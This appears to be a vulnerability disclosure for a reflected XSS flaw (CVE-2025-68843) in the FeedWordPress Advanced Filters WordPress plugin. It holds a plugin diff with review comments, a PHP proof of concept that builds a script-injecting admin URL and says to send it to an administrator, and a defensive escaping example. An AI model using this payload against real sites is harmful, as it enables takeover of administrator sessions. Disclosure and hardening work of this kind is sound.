-		return __("Add post to category when keywords match", "faf");
+		return __("Add post to category when keywords match");

 	}

@@ -99,16 +99,22 @@
       return $post;
 	}

-
+  /*   public function display()
+     {
+     	$args = $this->args;
+     	print_R($args);
+
+     } */
+


      public static function setControls()
      {
      	$controls = parent::setControls();
-     	$controls["filter_value"]["desc"] = __("Keyword", "faf");
+     	$controls["filter_value"]["desc"] = __("Keyword");
      	$controls["categories"] = array(
 		"name" => "faf_filter_categories",
-		"desc" => __("Categories", "faf"),
+		"desc" => __("Categories"),
 		"type" => "categories_box"
 		);
      	return $controls;
--- a/faf/filters/expire_post.php
+++ b/faf/filters/expire_post.php
@@ -14,10 +14,10 @@
 	{
 		echo "<p>";
 		_e("This filter allows you to expire posts after a certain time. You can either set to use the date of aggregation or the
-			  date the post has in the feed.", "faf");
+			  date the post has in the feed.");
 		echo "</p>";
 		echo "<p>";
-		 _e("Warning: if you delete posts on expiration date and they are still exist in the feed they will be resyndicated", "faf");
+		 _e("Warning: if you delete posts on expiration date and they are still exist in the feed they will be resyndicated");
 		echo "</p>";

 	}
@@ -25,7 +25,7 @@
 	/* Function not an attribute due for gettext */
 	public static function get_description()
 	{
-		return __("Expire posts", "faf");
+		return __("Expire posts");

 	}

@@ -115,26 +115,27 @@
 		if (! is_plugin_active("post-expirator/post-expirator.php"))
 		{
 			$controls["expirator_error"] = array("name" => "expire_need",
-					 "desc" => __("This filter needs <a href='http://wordpress.org/extend/plugins/post-expirator/' target='_blank'>Post expirator</a> plugin to function", "faf"),
+					 "desc" => __("This filter needs <a href='http://wordpress.org/extend/plugins/post-expirator/' target='_blank'>
+												 			Post expirator</a> plugin to function"),
 												"type" => "expire_need_expirator");
 			return $controls;
 		}
 		$controls = parent::setControls();
 		$controls["expire_method"] = array(
 		"name" => "filter_expire_method",
-		"desc" => __("Set expire-time:", "faf"),
+		"desc" => __("Set expire-time:"),
 		"type" => "radio",
 		"default" => "setdate",
-		"options" => array("postdate" => __("From post date", "faf"),"setdate" => __("From feed update", "faf"))
+		"options" => array("postdate" => __("From post date"),"setdate" => __("From feed update"))
 		);
 		$controls["expire_time"] = array(
 		"name" => "filter_expire_time",
-		"desc" => __("Time", "faf"),
+		"desc" => __("Time "),
 		"type" => "expire_time_box",
 		"default" => array(1,'m') );
 		$controls["expire_how"] = array(
 		"name" => "filter_expire_how",
-		"desc" => __("How to expire", "faf"),
+		"desc" => __("How to expire"),
 		"type" => "expire_how_box",
 		"default" => "draft");
 		return $controls;
@@ -180,12 +181,11 @@

 	private function get_time_options()
 	{
-		$time_options = array('h' => __("hour(s)", "faf"),
-							  'd' => __("day(s)", "faf"),
-							  'w' => __("week(s)", "faf"),
-							  'm' => __("month(s)", "faf"),
-							  'y' => __("year(s)", "faf")
-							 );
+		$time_options = array('h' => __("hour(s)"),
+							  'd' => __("day(s)"),
+							  'w' => __("week(s)"),
+							  'm' => __("month(s)"),
+							  'y' => __("year(s)"));
 		return $time_options;
 	}

--- a/faf/filters/image_filters.php
+++ b/faf/filters/image_filters.php
@@ -15,21 +15,21 @@
 	{
 		echo "<p>";
 		 _e("Filter for manipulation of images in your feed. You can remove images from the excerpt or resize
-		 			them using the standard WordPress sizes. ", "faf");
+		 			them using the standard WordPress sizes. ");
 		 echo "</p>";
 		 echo "<p>";
 		 _e("Save images locally: will save the feed image to your local wordpress installation instead
-		 		   of leaving it on the remote host", "faf");
+		 		   of leaving it on the remote host");
 		 echo "</p>";
 		 echo "<p>";

 		 _e("Images to process: in case you have multiple images you can select which ones to process,
 		 		   i.e '1,2,3,4'. This works together with 'remove unselected images'. Every image not processing
-		 		   will be dropped. Leave empty if all images should be processed or you have a feed with only one image", "faf");
+		 		   will be dropped. Leave empty if all images should be processed or you have a feed with only one image");
 		 echo "</p>";
 		 echo "<p>";

-		_e(" Set featured: Will set an image as 'featured image' in the Wordpress post and remove it from your content", "faf");
+		_e(" Set featured: Will set an image as 'featured image' in the Wordpress post and remove it from your content");

 		 echo "</p>";

@@ -38,13 +38,13 @@
 	/* Function not an attribute due for gettext */
 	public static function get_description()
 	{
-		return __("Image filters", "faf");
+		return __("Image filters");

 	}

    function execute()
+
    {
-   	faf_debug("Execute image filter");
     $post = $this->post;
     $args = $this->args;

@@ -58,11 +58,10 @@

     // all other filters except remove excerpt done there
     $post = $this->image_process($post,$args,"content");
-	faf_debug($post["meta"]);
+
 	// Do Enclosures
 	if (isset($post["meta"]["enclosure"]))
 	{
-		faf_debug("Execute : Enclosure images");
 	 	$filter_image_local = ( (isset($args["filter_image_local"]) && $args["filter_image_local"] == 1) ? 1 : 0);
 	 	if ($filter_image_local == 1)
 	 	{
@@ -80,30 +79,30 @@
 	$controls = parent::setControls();
 	$controls["image_local"] = array(
 		"name" => "filter_image_local",
-		"desc" => __("Save images locally", "faf"),
+		"desc" => __("Save images locally"),
 		"type" => "checkbox",
 		"default" => "1");
 	$controls["image_remove_excerpt"] = array(
 		"name" => "filter_image_remove_excerpt",
-		"desc" => __("Remove images from excerpt", "faf"),
+		"desc" => __("Remove images from excerpt"),
 		"type" => "checkbox",
 		"default" => "1");
 	$controls["image_size_box"] = array(
 		"name" => "faf_image_resize",
-		"desc" => __("Resize image to", "faf"),
+		"desc" => __("Resize image to"),
 		"type" => "image_size_box",
 		"default" => "medium");
 	$controls["image_process_select"] = array(
 		"name" => "faf_image_process_select",
-		"desc" => __("Images to process", "faf"),
+		"desc" => __("Images to process"),
 		"type" => "text");
 	$controls["image_remove_unselected"] = array(
 		"name" => "faf_image_remove",
-		"desc" => __("Remove unselected images", "faf"),
+		"desc" => __("Remove unselected images"),
 		"type" => "checkbox");
 	$controls["image_set_featured"] = array(
 		"name" => "faf_image_featured",
-		"desc" => __("Set featured image", "faf"),
+		"desc" => __("Set featured image"),
 		"type" => "checkbox");
 	return $controls;
      }
@@ -148,10 +147,7 @@
  	   				set_post_thumbnail($post_id, $attach_id);
  	   				delete_post_meta($post_id,'faf_featured_image');
  	   			}
- 	   			else {
- 	   			 faf_debug( is_numeric($attach_id) );
- 	   			 faf_debug("Attach Id ( $attach_id ) not integer for post_thumbnail $post_id");
- 	   			 }
+ 	   			else faf_debug("Attach Id ($attach_id) not integer for post_thumbnail $post_id");
     		break;
     		default: faf_debug("Process_complete: Meta Keys detected not of usuable type");
  	   		break;
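Review bot: `else faf_debug("Attach Id ($attach_id) not integer for post_thumbnail $post_id");` drops the braces around the `else` branch right before `break;`. It is correct today only because the `break;` belongs to the enclosing `case`; a second statement added to the branch later would silently fall outside the `else`. Keep the braces the removed form had.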
@@ -174,7 +170,7 @@
   	public static function image_size_box($page_type, $index = 0, $value = "", $filter_text)
   	{
   		$image_sizes = get_intermediate_image_sizes();
-  		array_unshift($image_sizes,__("Do not Resize", "faf"));
+  		array_unshift($image_sizes,__("Do not Resize"));
   		echo "<label>$filter_text</label>";
   		echo "<select name='faf_image_resize[$index]'>";
   		foreach($image_sizes as $image_size)
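Review bot: `image_size_box($page_type, $index = 0, $value = "", $filter_text)` declares a required parameter after optional ones, which PHP 8.0+ reports as deprecated and which makes the defaults unusable; reorder to `($page_type, $filter_text, $index = 0, $value = "")` and update the callers. On the unchanged lines, `echo "<label>$filter_text</label>";` and `echo "<select name='faf_image_resize[$index]'>";` emit both values raw; since this hunk already touches the function, write `esc_html($filter_text)` and `esc_attr($index)` so the control cannot be broken out of by whatever the caller passes.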
@@ -207,7 +203,7 @@
   */
  private function image_process($post, $args, $process_type = "content")
  	{
-	faf_debug("Image process");
+
 	$content = $post["post_$process_type"]; // excerpt or content

  	$filter_image_local = ( (isset($args["filter_image_local"]) && $args["filter_image_local"] == 1) ? 1 : 0);
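Review bot: as in `execute()`, the removed `faf_debug("Image process");` is replaced by a blank `+` line at the top of `image_process()`; remove the line rather than leaving whitespace.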
@@ -215,7 +211,6 @@
  	$remove_unselected = ((isset($args["faf_image_remove"])) ? $args["faf_image_remove"] : 0);

  	preg_match_all( '/<img[^>]+srcs*=s*["']?([^"' ]+)[^>]*>/i', $content, $matches, PREG_SET_ORDER );
-

  	// kill images that should not be processed
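Review bot: the context line `preg_match_all( '/<img[^>]+srcs*=s*["']?([^"' ]+)[^>]*>/i', ...)` cannot be valid PHP as shown: a single-quoted string cannot contain a bare `'`, and `srcs*=s*` matches the literal letter `s` rather than whitespace. The backslashes of `\s*` and `\'` have evidently been lost in rendering; confirm the committed file still has them, because a pattern that really lacked them would never match an `<img>` tag and the local-save path would silently do nothing.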

@@ -237,9 +232,7 @@
 					$args["imgext"] = $m[1];

 					if ($filter_image_local)
-					{
-						faf_debug("Image process :: Saving local image");
-						$post = $this->save_image_local($post,$args, $process_type);
+					{	$post = $this->save_image_local($post,$args, $process_type);

 					}
 					else
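Review bot: `{	$post = $this->save_image_local($post,$args, $process_type);` puts the opening brace and the statement on one line separated by a tab, and leaves an empty line before the closing brace; put the brace on its own line as the surrounding `if`/`else` blocks do.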
@@ -251,7 +244,6 @@
 				}
 			}
 		}
-	else { faf_debug("No image matches"); faf_debug($matches); }

 	return $post;
  }
@@ -267,8 +259,6 @@
    	return $post;
    }

-
-
     /** Function to check and save enclosures if needed
     *
     * Enclosure is a seperate optional feed in RSS-feeds. This function will check for (multiple) enclosures
@@ -279,9 +269,7 @@
  	private function save_enclosure($post)
  	{
  		$enclosure = $post["meta"]["enclosure"];
-		faf_debug("Enclosure save:");
-		faf_debug($enclosure);
-
+//faf_debug($enclosure);
  		if (! is_array($enclosure) || $enclosure == "")
  		{
  			return $post; // nothing to be done.
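Review bot: `+//faf_debug($enclosure);` replaces two live debug calls with commented-out code at column 0; delete it rather than leaving it in. On the unchanged `if (! is_array($enclosure) || $enclosure == "")` line, the second operand is dead: once `is_array()` is true, `array == ""` is never true in PHP, so an empty enclosure array proceeds into the loop. If the intent is to bail on an empty list, test `empty($enclosure)`.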
@@ -309,7 +297,6 @@

 				$new_file = wp_get_attachment_url($attach_id);
 				$new_enc = str_replace($match[0],$new_file,$enclosed);
-				faf_debug("New Enclosure:" . $new_enc);
 				$post["meta"]["enclosure"][$index] = $new_enc;
 			} else faf_debug("No match on $enclosed");
  		}
@@ -388,8 +375,6 @@
  			// remove spaces in filenames
  			$filename = str_replace('%20','',$filename);

- 			$filename = apply_filters('faf-saveimage-filename',$filename, $this->post, $this->args);
-
 			$upload_dir = wp_upload_dir();

 			$outfile = $upload_dir['path'] . '/' . $filename;
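Review bot: removing `$filename = apply_filters('faf-saveimage-filename', $filename, $this->post, $this->args);` deletes a public hook that third-party code may already be attached to; that is a breaking change and needs a changelog line or a deprecation period. It was also the one point where a site could rewrite the name before `$outfile = $upload_dir['path'] . '/' . $filename;`; with it gone, the only visible treatment of `$filename` is `str_replace('%20','',$filename)`. Pass it through `sanitize_file_name()` and `wp_unique_filename($upload_dir['path'], $filename)` before building `$outfile`.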
@@ -459,7 +444,6 @@
     	$path     = parse_url($imgsrc, PHP_URL_PATH);
 		$pathinfo = pathinfo($path);
 		$filename = $pathinfo["filename"] . "." . $imgext;
-

 		// start of save local
 		try {
@@ -467,7 +451,6 @@
 			}
 		catch (Exception $e)
 		{
-			faf_debug("Image exception happened: ");
 			faf_debug($e->getMessage());
 			return $post;
 		}
--- a/faf/filters/link_filter.php
+++ b/faf/filters/link_filter.php
@@ -17,13 +17,13 @@

 	public static function display_help_text()
 	{
-		_e("Formats incoming links to your preferences. If you want to remove links you can use the 'remove HTML from post' filter", "faf");
+		_e("Formats incoming links to your preferences. If you want to remove links you can use the 'remove HTML from post' filter");

 	}

 	public static function get_description()
 	{
-		return __("Link filter", "faf");
+		return __("Link filter");

 	}

@@ -34,12 +34,12 @@

       $controls["link_blank"] = array(
 		"name" => "filter_link_blank",
-		"desc" => __("Open links in new window", "faf"),
+		"desc" => __("Open links in new window"),
 		"type" => "checkbox",
 		"default" => "1");
 	  $controls["link_tracker"] = array(
 	  	"name" => "filter_link_tracker",
-	  	"desc" => __("Run filter through click tracker (URL of tracker)", "faf"),
+	  	"desc" => __("Run filter through click tracker (URL of tracker)"),
 	  	"type" => "text"
 	  	);
 	  return $controls;
@@ -59,7 +59,6 @@

 		if ($search_excerpt == 1)
 		{
-			$post["post_except"] = $this->findBareLinks($post["post_excerpt"]);
 			$this->load_content($post["post_excerpt"]);

 			$links = $this->get_links();
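Review bot: the removed line wrote to `$post["post_except"]` while reading `$post["post_excerpt"]`, so on the old side the bare-link conversion for excerpts landed in a misspelled key and never reached the excerpt. Deleting it is consistent with dropping `findBareLinks()`; if the feature is meant to stay, the fix is the key name, not the removal.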
@@ -74,7 +73,6 @@

 		if ($search_content == 1)
 		{
-			$post["post_content"] = $this->findBareLinks($post["post_content"]);
 			$this->load_content($post["post_content"]);
 			$links = $this->get_links();
 			if ($link_blank == 1)
@@ -88,29 +86,6 @@
 		return $post;
 	}

-	/* Find links without proper <A tags> and convert them to real links
-
-	@param $content String The content which is to be search
-	@return String The content searched for links and corrected to basic href.
-	@since 0.6.1
-	*/
-	protected function findBareLinks($content)
-	{
-		$pattern = "/((([A-Za-z]{3,9}:(?://)?)(?:[-;:&=+$,w]+@)?[A-Za-z0-9.-]+|(?:www.|[-;:&=+$,w]+@)[A-Za-z0-9.-]+)((?:/[+~%/.w-_]*)???(?:[-+=&;%@.w_]*)#?(?:[.!/\w]*))?)/i";
-		$matches = array();
-		preg_match_all($pattern, $content, $matches);
-		if (! is_array($matches) || count($matches) == 0)
-			return $content;
-
-		foreach($matches[0] as $link)
-		{
-			$content = str_replace($link, "<a href='$link'>$link</a>", $content);
-
-		}
-
-		return $content;
-	}
-
 	private function get_links() {

 	    $links = array();
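Review bot: `findBareLinks()` is documented `@since 0.6.1` yet is removed here, and the remove_html and image-filter hunks likewise delete the newer `filterLinks()` and the `faf-saveimage-filename` hook, so the `+` side of this diff reads as the older release; check that the a/ and b/ arguments were not swapped before treating this as the fix. If the function is kept, `str_replace($link, "<a href='$link'>$link</a>", $content)` interpolates matched text into an `href` with no `esc_url()`/`esc_attr()` and re-wraps URLs that already sit inside an existing `<a href>`; it needs both escaping and a check for an enclosing anchor, and the pattern as rendered has lost its backslashes (`[-;:&=+$,w]`, `www.`).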
--- a/faf/filters/remove_html.php
+++ b/faf/filters/remove_html.php
@@ -12,21 +12,21 @@
 	public static function display_help_text()
 	{
 		echo "<p>";
-		_e("Will remove HTML from post, title and excerpt. You can choose to keep certain families of tags.", "faf");
+		_e("Will remove HTML from post, title and excerpt. You can choose to keep certain families of tags.");
 		echo "</p>";
 		 echo "<p>";
-		_e("Keep HTML styles will not remove markup like strong, em, h1,h2 etc", "faf");
+		_e("Keep HTML styles will not remove markup like strong, em, h1,h2 etc");
 		echo "</p>";
 		echo "<p>";
 		_e("Custom tags: you can type the name of the tags you like preserved ( e.g. div ). You can enter multiple keywords comma-seperated
-		", "faf");
+		");
 		echo "</p>";
 	}

 	/* Function not an attribute due for gettext */
 	public static function get_description()
 	{
-		return __("Remove HTML from post", "faf");
+		return __("Remove HTML from post");

 	}

@@ -55,17 +55,12 @@


 		$allowed_array = array();  // see what is allowed through
-		$filter_bare_links = true; // Filter links even without <a> tags
-
 		if (isset($args["filter_allow_styles"]) && $args["filter_allow_styles"] == 1)
 			$allowed_array = array_merge($allowed_array,$a_style);
 		if (isset($args["filter_allow_images"]) && $args["filter_allow_images"] == 1)
 			$allowed_array = array_merge($allowed_array,$a_img);
 		if (isset($args["filter_allow_links"]) && $args["filter_allow_links"] == 1)
-		{
-			$filter_bare_links = false; // allow all types of links.
 			$allowed_array = array_merge($allowed_array,$a_link);
-		}
 		if (isset($args["filter_allow_custom"]))
 		{
 			$custom = explode(",",$args["filter_allow_custom"]);
@@ -80,23 +75,14 @@

 		// check for multiple keywords.
 		if (isset($args["filter_search_title"]) && $args["filter_search_title"] == 1)
-		{
 			$title = wp_kses($title, $allowed_array);
-			if ($filter_bare_link)
-				$title = $this->filterLinks($title);
-		}
+
 		if (isset($args["filter_search_content"]) && $args["filter_search_content"] == 1)
-		{	$content = wp_kses($content, $allowed_array);
-			if ($filter_bare_link)
-				$content = $this->filterLinks($content);
+			$content = wp_kses($content, $allowed_array);

-		}
 		if (isset($args["filter_search_excerpt"]) && $args["filter_search_excerpt"] == 1)
-		{
-		     $excerpt = wp_kses($excerpt,$allowed_array);
-			if ($filter_bare_link)
-				$excerpt = $this->filterLinks($excerpt);
-	    }
+		      	$excerpt = wp_kses($excerpt,$allowed_array);
+
 		$post["post_content"] = $content;
 		$post["post_excerpt"] = $excerpt;
 		$post["post_title"] = $title;
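Review bot: the removed `if ($filter_bare_link)` tests a variable that is never assigned; the flag declared in the previous hunk is `$filter_bare_links` (plural), so on the old side the branch was always false under a PHP notice and `filterLinks()` never ran. The removal therefore changes no behaviour. The replacement also drops the braces around the three `wp_kses()` calls and leaves `$excerpt = wp_kses($excerpt,$allowed_array);` indented with a mix of tabs and spaces; keep the braces and align the three blocks.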
@@ -105,20 +91,6 @@
 	      return $post;
      	    }

- 	 /* Function to filter Links without <a> tags in the form of http://www.example.com and other most frequent formats.
-
- 	 @param String content - The content on which to execute the filter
- 	 @return String The filtered content
- 	 @since 0.6.1.
- 	 */
-	 private function filterLinks($content)
-	 {
-		$pattern = "/((([A-Za-z]{3,9}:(?://)?)(?:[-;:&=+$,w]+@)?[A-Za-z0-9.-]+|(?:www.|[-;:&=+$,w]+@)[A-Za-z0-9.-]+)((?:/[+~%/.w-_]*)???(?:[-+=&;%@.w_]*)#?(?:[.!/\w]*))?)/i";
-		 preg_replace($pattern, '',$content);
-
-		 return $content;
-
-	 }

      protected static function setControls()
      {
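Review bot: the removed `filterLinks()` called `preg_replace($pattern, '',$content);` and discarded the return value, then returned `$content` unchanged, so it was a no-op even where invoked. Fine to delete; if it ever returns, assign the result (`$content = preg_replace(...)`) and handle the `null` that `preg_replace()` returns on a pattern error.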
--- a/faf/filters/remove_keywords.php
+++ b/faf/filters/remove_keywords.php
@@ -14,14 +14,14 @@
 		 _e("This filter will remove certain keywords in the text. For instance if you are aggrating a
 		newspaper which always starts with a location 'New York-' which is not relevant, you can choose to remove this.
 		You can add multiple keywords comma-seperated.
-		", "faf");
+		");

 	}

 	/* Function not an attribute due for gettext */
 	public static function get_description()
 	{
-		return __("Remove keywords from post", "faf");
+		return __("Remove keywords from post");

 	}
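Review bot: the help text on the unchanged lines above reads `aggrating` and `comma-seperated`; since this hunk rewrites the `_e()` call anyway, correct them to `aggregating` and `comma-separated` in the same change so translators receive a clean source string.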

@@ -89,7 +89,7 @@
     protected static function setControls()
      {
      	$controls = parent::setControls();
-     	$controls["filter_value"]["desc"] = __("Keywords:", "faf"); // different description
+     	$controls["filter_value"]["desc"] = __("Keywords:"); // different description
      	return $controls;
      }

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-68843 - FeedWordPress Advanced Filters <= 0.6.2 - Reflected Cross-Site Scripting
/**
 * Proof of Concept for CVE-2025-68843
 * Reflected XSS in FeedWordPress Advanced Filters plugin <= 0.6.2
 *
 * This script demonstrates the vulnerability by generating a malicious URL
 * that triggers XSS when visited by an authenticated administrator.
 *
 * Usage: php poc.php --url https://target-wp-site.com
 */

// Configuration
$target_url = 'https://target-wp-site.com'; // Change this to target WordPress site

// Parse command line arguments
if ($argc > 1 && $argv[1] === '--url' && isset($argv[2])) {
    $target_url = rtrim($argv[2], '/');
}

// XSS payload - simple alert to demonstrate execution.
// It closes the attribute the value is reflected into, then opens a script tag.
$payload = '"><script>alert(document.domain)</script>';

// Construct malicious URL targeting the plugin's admin interface.
// The page slug and the page_type query parameter are the ones this PoC uses;
// urlencode() keeps the payload intact through the query string.
$malicious_url = $target_url . '/wp-admin/admin.php?page=feedwordpressfaf&page_type=' . urlencode($payload);

// Display the exploit URL
echo "========================================\n";
echo "Atomic Edge CVE-2025-68843 PoC\n";
echo "FeedWordPress Advanced Filters XSS\n";
echo "========================================\n\n";
echo "Target: {$target_url}\n";
echo "Vulnerable Plugin: FeedWordPress Advanced Filters <= 0.6.2\n";
echo "\nMalicious URL:\n";
echo "{$malicious_url}\n\n";

// Optional: test whether the plugin's admin page responds.
// Caveat: wp-admin pages redirect unauthenticated requests to wp-login.php, so
// with CURLOPT_FOLLOWLOCATION this request ends on the login form unless a
// valid admin session cookie is supplied (e.g. via CURLOPT_COOKIE). Treat a
// negative result as "unconfirmed", not as "not installed".
$test_url = $target_url . '/wp-admin/admin.php?page=feedwordpressfaf';
$ch = curl_init($test_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); // lab targets often use self-signed certificates
curl_setopt($ch, CURLOPT_TIMEOUT, 10);
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

// Check for plugin indicators in the admin page body
if ($response !== false && $http_code === 200 && strpos($response, 'Feedwordpress Advanced Filters') !== false) {
    echo "[+] Plugin appears to be active on target\n";
    echo "[+] Send the malicious URL to an authenticated administrator\n";
    echo "[+] When visited, the script will execute in their browser context\n";
} else {
    echo "[-] Could not confirm plugin activation\n";
    echo "[-] The plugin might not be active, or the request was redirected to the login page\n";
}

// Summary of the vulnerability mechanics
echo "\n========================================\n";
echo "Vulnerability Details:\n";
echo "- Attack Vector: Reflected XSS via page_type parameter\n";
echo "- Authentication Required: No (but requires admin to click link)\n";
echo "- Impact: Arbitrary JavaScript execution as admin\n";
echo "- Patch: Upgrade to version > 0.6.2\n";
?>
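As an added illustration of the reflection the PoC above targets (example code, not the plugin's own and not part of Atomic Edge's PoC), the following PHP renders a request-derived `$page_type` value two ways: the unescaped shape, and the shape that uses WordPress's `esc_attr()` for the attribute context and `esc_html()` for element text. It then parses both renders with `DOMDocument` and counts `<script>` elements, which is what decides whether the payload runs in the browser. The markup, the function names, and the `htmlspecialchars()` shim used when WordPress is not loaded are assumptions of this example; run it with `php` on the command line.

```php
<?php
// Added example (not plugin or Atomic Edge code): the attribute-reflection
// pattern the PoC payload relies on, beside the escaped form, with a DOM
// check that counts <script> elements in what the browser would receive.
// Assumptions: the reflected value lands in a double-quoted HTML attribute
// and in element text, and when WordPress is not loaded esc_attr()/esc_html()
// are shimmed with htmlspecialchars(), which encodes the characters that matter
// here (" ' < > &).
if (!function_exists('esc_attr')) {
    function esc_attr($text) {
        return htmlspecialchars((string) $text, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    }
}
if (!function_exists('esc_html')) {
    function esc_html($text) {
        return htmlspecialchars((string) $text, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    }
}

// Vulnerable shape: a request-derived value dropped straight into markup.
function render_page_type_unsafe(string $page_type): string {
    return "<input type=\"hidden\" name=\"page_type\" value=\"$page_type\" />\n"
         . "<h2>$page_type</h2>\n";
}

// Hardened shape: escape for the context each copy of the value lands in
// (attribute value -> esc_attr, element text -> esc_html).
function render_page_type_safe(string $page_type): string {
    return '<input type="hidden" name="page_type" value="' . esc_attr($page_type) . "\" />\n"
         . '<h2>' . esc_html($page_type) . "</h2>\n";
}

// Count <script> elements the way a browser's HTML parser would see them.
function count_script_elements(string $html): int {
    $dom = new DOMDocument();
    libxml_use_internal_errors(true);   // tolerate fragment markup quietly
    $dom->loadHTML('<!DOCTYPE html><body>' . $html . '</body>');
    libxml_clear_errors();
    return $dom->getElementsByTagName('script')->length;
}

// Constructed input: the PoC's payload as it arrives after URL decoding.
$payload = '"><script>alert(document.domain)</script>';

$unsafe = render_page_type_unsafe($payload);
$safe   = render_page_type_safe($payload);

printf("unsafe markup:\n%s  -> %d <script> element(s)\n\n", $unsafe, count_script_elements($unsafe));
printf("escaped markup:\n%s  -> %d <script> element(s)\n", $safe, count_script_elements($safe));
```

The unescaped render breaks out of both the attribute and the heading, so the parser sees live `<script>` elements; the escaped render keeps the payload as inert text (`&quot;&gt;&lt;script&gt;...`) and the count is zero. The point of the two helpers is that the escaping function is chosen by the output context, not by the input: the same value needs `esc_attr()` inside an attribute and `esc_html()` between tags, and a value placed in a URL would need `esc_url()`.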
